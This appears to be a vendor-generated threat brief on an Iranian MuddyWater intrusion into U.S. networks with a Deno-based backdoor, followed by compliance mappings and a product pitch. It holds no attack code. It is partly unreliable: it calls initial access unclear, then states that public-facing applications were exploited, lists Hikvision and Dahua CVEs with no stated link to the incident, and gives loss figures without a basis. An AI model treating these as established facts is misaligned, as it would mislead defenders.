Executive Summary
In early February 2026, the Iranian state-sponsored hacking group MuddyWater (also known as Seedworm) infiltrated networks of multiple U.S. organizations, including a bank, an airport, and a software company with Israeli operations. The attackers deployed a previously unknown backdoor named Dindoor, which utilizes the Deno JavaScript runtime for execution. Additionally, they attempted data exfiltration using the Rclone utility to a Wasabi cloud storage bucket. The initial access methods remain unclear, but MuddyWater is known for using phishing emails and exploiting vulnerabilities in public-facing applications. (thehackernews.com)
This incident underscores the evolving capabilities of Iranian threat actors, who have demonstrated improved tooling and social engineering tactics. The timing of these intrusions, coinciding with escalating geopolitical tensions following U.S. and Israeli military actions, highlights the potential for cyber operations to serve as instruments of state power during periods of conflict. (thehackernews.com)
Why This Matters Now
The presence of MuddyWater within critical U.S. networks poses an immediate threat, especially amid rising geopolitical tensions. Organizations must enhance their cybersecurity measures to prevent potential data breaches and operational disruptions.
Attack Path Analysis
MuddyWater initiated the attack by exploiting vulnerabilities in public-facing applications to gain initial access. They escalated privileges by deploying the Dindoor backdoor, allowing deeper system control. The attackers moved laterally within the network, deploying additional malware like Fakeset to expand their foothold. They established command and control channels using the Dindoor backdoor to communicate with external servers. Data exfiltration was attempted using the Rclone utility to transfer data to external cloud storage. The impact of the attack included potential data breaches and system compromise, though the full extent remains unclear.
Kill Chain Progression
Initial Compromise
Description
MuddyWater exploited vulnerabilities in public-facing applications to gain initial access to the target networks.
Related CVEs
CVE-2017-7921
CVSS 9.8An improper authentication vulnerability in Hikvision devices allows remote attackers to escalate privileges and access sensitive information.
Affected Products:
Hikvision DS-2CD2xx2F-I Series – V5.2.0 build 140721 to V5.4.0 build 160530
Hikvision DS-2CD2xx0F-I Series – V5.2.0 build 140721 to V5.4.0 Build 160401
Hikvision DS-2CD2xx2FWD Series – V5.3.1 build 150410 to V5.4.4 Build 161125
Hikvision DS-2CD4x2xFWD Series – V5.2.0 build 140721 to V5.4.0 Build 160414
Hikvision DS-2CD4xx5 Series – V5.2.0 build 140721 to V5.4.0 Build 160421
Hikvision DS-2DFx Series – V5.2.0 build 140805 to V5.4.5 Build 160928
Hikvision DS-2CD63xx Series – V5.0.9 build 140305 to V5.3.5 Build 160106
Exploit Status:
exploited in the wildCVE-2023-6895
CVSS 9.8An OS command injection vulnerability in Hikvision Intercom Broadcasting System allows remote attackers to execute arbitrary commands.
Affected Products:
Hikvision Intercom Broadcasting System – 3.0.3_20201113_RELEASE(HIK)
Exploit Status:
proof of conceptCVE-2021-36260
CVSS 9.8A command injection vulnerability in Hikvision web servers allows remote attackers to execute arbitrary commands.
Affected Products:
Hikvision Various Hikvision Products – Multiple versions
Exploit Status:
exploited in the wildCVE-2025-34067
CVSS 10An unauthenticated remote command execution vulnerability in Hikvision Integrated Security Management Platform due to deserialization of untrusted data.
Affected Products:
Hikvision Integrated Security Management Platform – Affected versions
Exploit Status:
active scanning observedCVE-2021-33044
CVSS 9.8An authentication bypass vulnerability in Dahua products allows remote attackers to bypass device identity authentication.
Affected Products:
Dahua Various Dahua Products – Multiple versions
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Techniques identified for SEO/filtering; may be expanded with full STIX/TAXII enrichment later.
Spearphishing Attachment
Command and Scripting Interpreter: PowerShell
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Subvert Trust Controls: Code Signing
System Information Discovery
Exfiltration Over C2 Channel
Ingress Tool Transfer
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components and software are protected from known vulnerabilities by installing applicable vendor-supplied security patches.
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Identity and Access Management
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Banking/Mortgage
Iranian state-sponsored MuddyWater targeted U.S. banks with Dindoor backdoor, exploiting east-west traffic and egress controls for data exfiltration via encrypted channels.
Airlines/Aviation
U.S. airports compromised by MuddyWater using Fakeset Python backdoor, targeting critical infrastructure through lateral movement and command-control vulnerabilities in operational technology systems.
Computer Software/Engineering
Defense/aerospace software supplier's Israeli operations breached with attempted data exfiltration to cloud storage, highlighting supply chain risks and zero trust segmentation failures.
Defense/Space
Software suppliers to defense industry targeted by Iranian intelligence, demonstrating state-sponsored espionage threats requiring enhanced multicloud visibility and threat detection capabilities.
Sources
- Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoorhttps://thehackernews.com/2026/03/iran-linked-muddywater-hackers-target.htmlVerified
- Mori, Software S1047 | MITRE ATT&CK®https://attack.mitre.org/software/S1047/Verified
- CVE-2017-7921 Detailhttps://nvd.nist.gov/vuln/detail/CVE-2017-7921Verified
- CVE-2023-6895 Detailhttps://nvd.nist.gov/vuln/detail/CVE-2023-6895Verified
- CVE-2021-36260 Detailhttps://nvd.nist.gov/vuln/detail/CVE-2021-36260Verified
- CVE-2025-34067 Detailhttps://nvd.nist.gov/vuln/detail/CVE-2025-34067Verified
- CVE-2021-33044 Detailhttps://nvd.nist.gov/vuln/detail/CVE-2021-33044Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have constrained MuddyWater's lateral movement and data exfiltration, thereby reducing the attack's blast radius.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The attacker's ability to exploit vulnerabilities in public-facing applications may have been limited, reducing the likelihood of initial access.
Control: Zero Trust Segmentation
Mitigation: The attacker's ability to escalate privileges and gain deeper system control could have been constrained, limiting their access scope.
Control: East-West Traffic Security
Mitigation: The attacker's lateral movement within the network could have been limited, reducing their ability to deploy additional malware.
Control: Multicloud Visibility & Control
Mitigation: The attacker's ability to establish command and control channels may have been constrained, limiting external communications.
Control: Egress Security & Policy Enforcement
Mitigation: The attacker's data exfiltration attempts could have been limited, reducing the risk of data breaches.
The overall impact of the attack could have been reduced, limiting data breaches and system compromise.
Impact at a Glance
Affected Business Functions
- Network Security
- Data Integrity
- Operational Continuity
Estimated downtime: 7 days
Estimated loss: $500,000
Potential exposure of sensitive corporate data and intellectual property.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust Segmentation to restrict lateral movement and limit the spread of malware within the network.
- • Deploy East-West Traffic Security measures to monitor and control internal traffic, detecting unauthorized communications.
- • Utilize Egress Security & Policy Enforcement to prevent unauthorized data exfiltration to external destinations.
- • Enhance Threat Detection & Anomaly Response capabilities to identify and respond to malicious activities promptly.
- • Ensure comprehensive Multicloud Visibility & Control to maintain oversight across all cloud environments and detect anomalous interactions.
